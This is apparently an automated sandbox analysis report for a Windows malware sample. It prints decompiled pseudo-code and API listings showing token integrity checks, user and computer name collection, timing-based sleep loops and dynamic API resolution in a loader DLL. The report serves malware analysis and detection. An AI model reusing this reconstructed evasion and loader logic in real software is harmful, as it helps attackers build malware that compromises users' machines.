                                                                                                                                                                                                                                                                                    0x00a72e0b

APIs
  • Part of subcall function 00A75901: GetModuleHandleA.KERNEL32(4C44544E,00000000,00A72D7C,00000000,00000000,00000000,?,?,?,?,?,00A744F9,?,00000001), ref: 00A75910
• ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00A7A2D8,00000000), ref: 00A72DE7
• CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00A744F9,?,00000001), ref: 00A72E00
• wsprintfA.USER32 ref: 00A72E80
• memset.NTDLL ref: 00A72EB0
• RtlInitializeCriticalSection.NTDLL(055695F0), ref: 00A72EC1
• RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00A72EEA
• wsprintfA.USER32 ref: 00A72F1A
  • Part of subcall function 00A73946: GetUserNameW.ADVAPI32(00000000,00A72F3F), ref: 00A7397D
  • Part of subcall function 00A73946: RtlAllocateHeap.NTDLL(00000000,00A72F3F), ref: 00A73994
  • Part of subcall function 00A73946: GetUserNameW.ADVAPI32(00000000,00A72F3F), ref: 00A739A1
  • Part of subcall function 00A73946: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00A72F3F,?,?,?,?,?,00A744F9,?,00000001), ref: 00A739C2
  • Part of subcall function 00A73946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A739E9
  • Part of subcall function 00A73946: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A739FD
  • Part of subcall function 00A73946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A73A0A
  • Part of subcall function 00A73946: HeapFree.KERNEL32(00000000,00000000), ref: 00A73A28
  • Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A
Memory Dump Source
• Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
Similarity
• API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
• String ID:
• API String ID: 2910951584-0
• Opcode ID: ee4db544c44976499c01269143eed36851f1c08e55db1b0014f829e4a47ca958
• Instruction ID: ddfba044cdbca9d0ecc1406284058d072ed4d452bd8e5d99a14c7e602330abfe
• Opcode Fuzzy Hash: ee4db544c44976499c01269143eed36851f1c08e55db1b0014f829e4a47ca958
• Instruction Fuzzy Hash: DD51F372E40214BFDB21DBA4DC89FAE77B8AB54710F10C115F90DEB261E7719D828BA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00A71041(long* _a4) {
	long _v8;
	void* _v12;
	void _v16;
	long _v20;
	int _t33;
	void* _t46;

	_v16 = 1;
	_v20 = 0x2000;
	if( *0xa7a2b4 > 5) {
		_v16 = 0;
		if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
			GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
			_v8 = 0;
			GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
			if(_v8 != 0) {
				_t46 = E00A75C4E(_v8);
				if(_t46 != 0) {
					_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
					if(_t33 != 0) {
						_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
					}
					E00A72A03(_t46);
				}
			}
			CloseHandle(_v12);
		}
	}
	 *_a4 = _v20;
	return _v16;
}

APIs
• OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00A71073
• GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00A71093
• GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00A710A3
• CloseHandle.KERNEL32(00000000), ref: 00A710F3
  • Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A
• GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00A710C6
• GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00A710CE
• GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00A710DE
Memory Dump Source
• Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
Similarity
• API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
• String ID:
• API String ID: 1295030180-0
• Opcode ID: 91e46afd7a414c0821007af1bc718cc08b3d68c118c9f22006d78fe4b428a673
• Instruction ID: f4217de10b2db4c559cf0fb9a7a55717e9efc78c2a7988ce573898ab9009a8c9
• Opcode Fuzzy Hash: 91e46afd7a414c0821007af1bc718cc08b3d68c118c9f22006d78fe4b428a673
• Instruction Fuzzy Hash: 75215C75900249FFEB10DFD4DD44EEEBBBDFB44300F008065E514A2161DB714A86EB50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 73%
E00A74430(signed int __edx, intOrPtr _a4) {
	struct _FILETIME _v12;
	char _v32;
	long _v40;
	void* _t14;
	void* _t16;
	int _t18;
	signed int _t20;
	void* _t22;
	signed int _t23;
	intOrPtr _t25;
	unsigned int _t29;
	signed int _t33;
	signed int _t40;

	_t33 = __edx;
	_t14 = HeapCreate(0, 0x400000, 0); // executed
	 *0xa7a290 = _t14;
	if(_t14 != 0) {
		 *0xa7a180 = GetTickCount();
		_t16 = E00A72A18(_a4);
		if(_t16 != 0) {
			L10:
			return _t16;
		} else {
			goto L3;
		}
		do {
			L3:
			GetSystemTimeAsFileTime( &_v12);
			_t18 = SwitchToThread();
			_t29 = _v12.dwHighDateTime;
			_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
			_push(0);
			_push(9);
			_push(_t29 >> 7);
			_push(_t20);
			L00A780B2();
			_t40 = _t18 + _t20;
			_t22 = E00A73F5D(_a4, _t40);
			_t23 = 2;
			Sleep(_t23 << _t40); // executed
		} while (_t22 == 1);
		_t25 =  *0xa7a2ac; // 0x2d4
		_v32 = 0;
		if(_t25 != 0) {
			__imp__(_t25,  &_v32);
			if(_t25 == 0) {
				_v40 = 0;
			}
			if(_v40 != 0) {
				 *0xa7a2b8 = 1; // executed
			}
		}
		_t16 = E00A72D63(_t33); // executed
		goto L10;
	}
	_t16 = 8;
	goto L10;
}
















                                                                                                                                                                                                                                                                                    0x00a744b2
                                                                                                                                                                                                                                                                                    0x00a744b8
                                                                                                                                                                                                                                                                                    0x00a744be
                                                                                                                                                                                                                                                                                    0x00a744c3
                                                                                                                                                                                                                                                                                    0x00a744ca
                                                                                                                                                                                                                                                                                    0x00a744ce
                                                                                                                                                                                                                                                                                    0x00a744d6
                                                                                                                                                                                                                                                                                    0x00a744de
                                                                                                                                                                                                                                                                                    0x00a744e0
                                                                                                                                                                                                                                                                                    0x00a744e0
                                                                                                                                                                                                                                                                                    0x00a744e8
                                                                                                                                                                                                                                                                                    0x00a744ea
                                                                                                                                                                                                                                                                                    0x00a744ea
                                                                                                                                                                                                                                                                                    0x00a744e8
                                                                                                                                                                                                                                                                                    0x00a744f4
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a744f4
                                                                                                                                                                                                                                                                                    0x00a74456
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00A74445
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00A7445C
                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00A7447C
                                                                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32(?,00000001), ref: 00A74482
                                                                                                                                                                                                                                                                                    • _aullrem.NTDLL(?,?,00000009,00000000), ref: 00A7449E
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00A744B8
                                                                                                                                                                                                                                                                                    • IsWow64Process.KERNEL32(000002D4,?,?,00000001), ref: 00A744D6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3690864001-0
                                                                                                                                                                                                                                                                                    • Opcode ID: dd297e83bb48b427d6e9e2349088cfabbe6bf3627b332c56f020d43b2d666f3f
                                                                                                                                                                                                                                                                                    • Instruction ID: a9cab89c758ec9178df0407c67f226f70290fcfe51ae011fe67d23bc9cfd3e7e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd297e83bb48b427d6e9e2349088cfabbe6bf3627b332c56f020d43b2d666f3f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0221A2B2A04204AFDB10EFA4DC89B6F77E8BB48350F00C92AF55DC2151E7349886DB62
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                                                                    			E00A75AE3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                                                                                                    				char* _t19;
                                                                                                                                                                                                                                                                                    				char* _t28;
                                                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                                                                    				char* _t36;
                                                                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                                                                                                    				char* _t40;
                                                                                                                                                                                                                                                                                    				char* _t42;
                                                                                                                                                                                                                                                                                    				char* _t43;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t34 = __edx;
                                                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                                                    				_t9 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    				_t1 = _t9 + 0xa7b61b; // 0x253d7325
                                                                                                                                                                                                                                                                                    				_t36 = 0;
                                                                                                                                                                                                                                                                                    				_t28 = E00A747BA(__ecx, _t1);
                                                                                                                                                                                                                                                                                    				if(_t28 != 0) {
                                                                                                                                                                                                                                                                                    					_t39 = __imp__;
                                                                                                                                                                                                                                                                                    					_t13 =  *_t39(_t28, _t38);
                                                                                                                                                                                                                                                                                    					_v8 = _t13;
                                                                                                                                                                                                                                                                                    					_t6 =  *_t39(_a4) + 1; // 0x5569631
                                                                                                                                                                                                                                                                                    					_t40 = E00A75C4E(_v8 + _t6);
                                                                                                                                                                                                                                                                                    					if(_t40 != 0) {
                                                                                                                                                                                                                                                                                    						strcpy(_t40, _t28);
                                                                                                                                                                                                                                                                                    						_pop(_t33);
                                                                                                                                                                                                                                                                                    						__imp__(_t40, _a4);
                                                                                                                                                                                                                                                                                    						_t19 = E00A71AF1(_t33, _t34, _t40, _a8); // executed
                                                                                                                                                                                                                                                                                    						_t36 = _t19;
                                                                                                                                                                                                                                                                                    						E00A72A03(_t40);
                                                                                                                                                                                                                                                                                    						_t42 = E00A7332F(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                                                                                                                    						if(_t42 != 0) {
                                                                                                                                                                                                                                                                                    							E00A72A03(_t36);
                                                                                                                                                                                                                                                                                    							_t36 = _t42;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t43 = E00A74138(_t36, _t33);
                                                                                                                                                                                                                                                                                    						if(_t43 != 0) {
                                                                                                                                                                                                                                                                                    							E00A72A03(_t36);
                                                                                                                                                                                                                                                                                    							_t36 = _t43;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00A72A03(_t28);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t36;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A747BA: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A75AFC,253D7325,00000000,00000000,?,00000000,00A76301), ref: 00A74821
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A747BA: sprintf.NTDLL ref: 00A74842
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B0E
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B16
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A
                                                                                                                                                                                                                                                                                    • strcpy.NTDLL ref: 00A75B2D
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00A75B38
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71AF1: lstrlen.KERNEL32(00000000,00000000,00A76301,00000000,?,00A75B47,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A71B02
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72A03: HeapFree.KERNEL32(00000000,00000000,00A74072,00000000,?,?,00000000,?,?,?,?,?,?,00A744AE,00000000), ref: 00A72A0F
                                                                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A75B55
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7332F: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00A75B61,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A73339
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7332F: _snprintf.NTDLL ref: 00A73397
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                                                                    • String ID: =
                                                                                                                                                                                                                                                                                    • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                                                                    • Opcode ID: e411e5bb24e99542436fb92c6ab54363107de6f7fd9fa6da2ff95909183ed71b
                                                                                                                                                                                                                                                                                    • Instruction ID: cd4f3374db9fa50f4af5ac5d588f5e6b7b079cde2bb89cb8045c72a812cc5190
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e411e5bb24e99542436fb92c6ab54363107de6f7fd9fa6da2ff95909183ed71b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1119133D016257B4622B7B89D85CAE369D9E857A0709C115F50C9B102EFB4DD0257E1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00A716B2
                                                                                                                                                                                                                                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00A71734
                                                                                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,006E0069), ref: 00A71773
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00A71795
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A713B4: SysAllocString.OLEAUT32(00A792D0), ref: 00A71404
                                                                                                                                                                                                                                                                                    • SafeArrayDestroy.OLEAUT32(?), ref: 00A717E9
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00A717F7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75872: Sleep.KERNELBASE(000001F4), ref: 00A758BA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2118684380-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e98e8824a8e7fcb1a6f9d990701145e480fd54d1709c02d83e7d30914b55aecc
                                                                                                                                                                                                                                                                                    • Instruction ID: 8a3c2f6617a5baa9d46d1b1fba325848c6045386ec49ae329d87b5a7e3331c51
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e98e8824a8e7fcb1a6f9d990701145e480fd54d1709c02d83e7d30914b55aecc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7351FB76900209AFDB14DFE8CC848AEB7B6FF88350B15C869E549EB220D7719D46CF51
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E6E051AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t56 = E6E051C8F(0x20);
                                                                                                                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t50 = GetModuleHandleA( *0x6e0541d0 + 0x6e055014);
                                                                                                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                                                                                                    					_t29 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e0550e1);
                                                                                                                                                                                                                                                                                    					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                                                    						E6E05136A(_t56);
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t33 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e0550f1);
                                                                                                                                                                                                                                                                                    						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t36 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e055104);
                                                                                                                                                                                                                                                                                    							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                                                                    							if(_t36 == 0) {
                                                                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t39 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e055119);
                                                                                                                                                                                                                                                                                    								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_t42 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e05512f);
                                                                                                                                                                                                                                                                                    									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                                                                    									if(_t42 == 0) {
                                                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                                                                    										_t46 = E6E0518D1(_t56, _a12); // executed
                                                                                                                                                                                                                                                                                    										_v8 = _t46;
                                                                                                                                                                                                                                                                                    										if(_t46 != 0) {
                                                                                                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *_a16 = _t56;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051C8F: HeapAlloc.KERNEL32(00000000,?,6E05117D,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C9B
                                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E051272,?,?,?,?,00000002,00000000,?,?), ref: 6E051AC9
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E051AEB
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E051B01
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E051B17
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E051B2D
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E051B43
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E0518D1: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6E05192E
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E0518D1: memset.NTDLL ref: 6E051950
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1632424568-0
                                                                                                                                                                                                                                                                                    • Opcode ID: addb383dcf0a247a8ed5d69168a07056963f7f6558a2746290e06db661af9f6a
                                                                                                                                                                                                                                                                                    • Instruction ID: 27570ec3e8125e34ab7f3adaa770dbf98e78e527a34629217c6a048ebf51dea6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: addb383dcf0a247a8ed5d69168a07056963f7f6558a2746290e06db661af9f6a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 312174B5500B0AAFEB50DFA9CA90F5B7BECFF46284B004425E845D7351E734E925CBA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                                                    				char _t9;
                                                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                                                    				_t9 = _a8;
                                                                                                                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                                                                    					_t10 = InterlockedDecrement(0x6e054188);
                                                                                                                                                                                                                                                                                    					__eflags = _t10;
                                                                                                                                                                                                                                                                                    					if(_t10 == 0) {
                                                                                                                                                                                                                                                                                    						__eflags =  *0x6e05418c;
                                                                                                                                                                                                                                                                                    						if( *0x6e05418c != 0) {
                                                                                                                                                                                                                                                                                    							_t36 = 0x2328;
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								SleepEx(0x64, 1);
                                                                                                                                                                                                                                                                                    								__eflags =  *0x6e054198;
                                                                                                                                                                                                                                                                                    								if( *0x6e054198 == 0) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                                                                    								__eflags = _t36;
                                                                                                                                                                                                                                                                                    								if(_t36 > 0) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							CloseHandle( *0x6e05418c);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						HeapDestroy( *0x6e054190);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(_t9 == 1 && InterlockedIncrement(0x6e054188) == 1) {
                                                                                                                                                                                                                                                                                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                                                                    						_t41 = _t18;
                                                                                                                                                                                                                                                                                    						 *0x6e054190 = _t18;
                                                                                                                                                                                                                                                                                    						if(_t18 == 0) {
                                                                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *0x6e0541b0 = _a4;
                                                                                                                                                                                                                                                                                    							asm("lock xadd [eax], edi");
                                                                                                                                                                                                                                                                                    							_push( &_a8);
                                                                                                                                                                                                                                                                                    							_t23 = E6E051CA4(E6E051D32, E6E051EE0(_a12, 1, 0x6e054198, _t41));
                                                                                                                                                                                                                                                                                    							 *0x6e05418c = _t23;
